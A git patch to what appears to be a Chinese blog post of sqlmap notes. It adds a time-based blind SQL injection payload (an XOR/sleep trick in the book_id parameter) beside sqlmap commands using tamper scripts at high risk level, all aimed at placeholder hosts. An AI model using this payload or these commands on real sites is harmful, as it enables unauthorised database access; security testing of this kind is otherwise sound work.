From 33cd57afb5234062e50f1fab9f7d9a2396642ad4 Mon Sep 17 00:00:00 2001
From: 79374 <vip8899889@qq.com>
Date: Tue, 9 Jul 2024 12:52:47 +0800
Subject: [PATCH] fix text

---
 _posts/2024/06/2024-06-29-smap-python.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/_posts/2024/06/2024-06-29-smap-python.md b/_posts/2024/06/2024-06-29-smap-python.md
index 31e83b6..a3fe8ef 100644
--- a/_posts/2024/06/2024-06-29-smap-python.md
+++ b/_posts/2024/06/2024-06-29-smap-python.md
@@ -25,6 +25,10 @@ python3 sqlmap.py -u "http://m.xxx.com/books/areward?book_id=1&gift_id=1" -p boo
 python3 sqlmap.py -u "http://m.xxx.com/books/areward?book_id=1&gift_id=1" -p book_id --dbms=mysql  --level=5 --risk=3 --tamper=space2comment.py,between.py --current-db --random-agent --time-sec=10 --batch
 ```
 
+sql注入
+```
+http://www.xxx.com/?a=detail&book_id=1590'XOR(159*if(now()=sysdate()%2Csleep(26)%2C0))XOR'Z&replyid=92&s=commit
+````
 
 ### 漏洞回显
 ```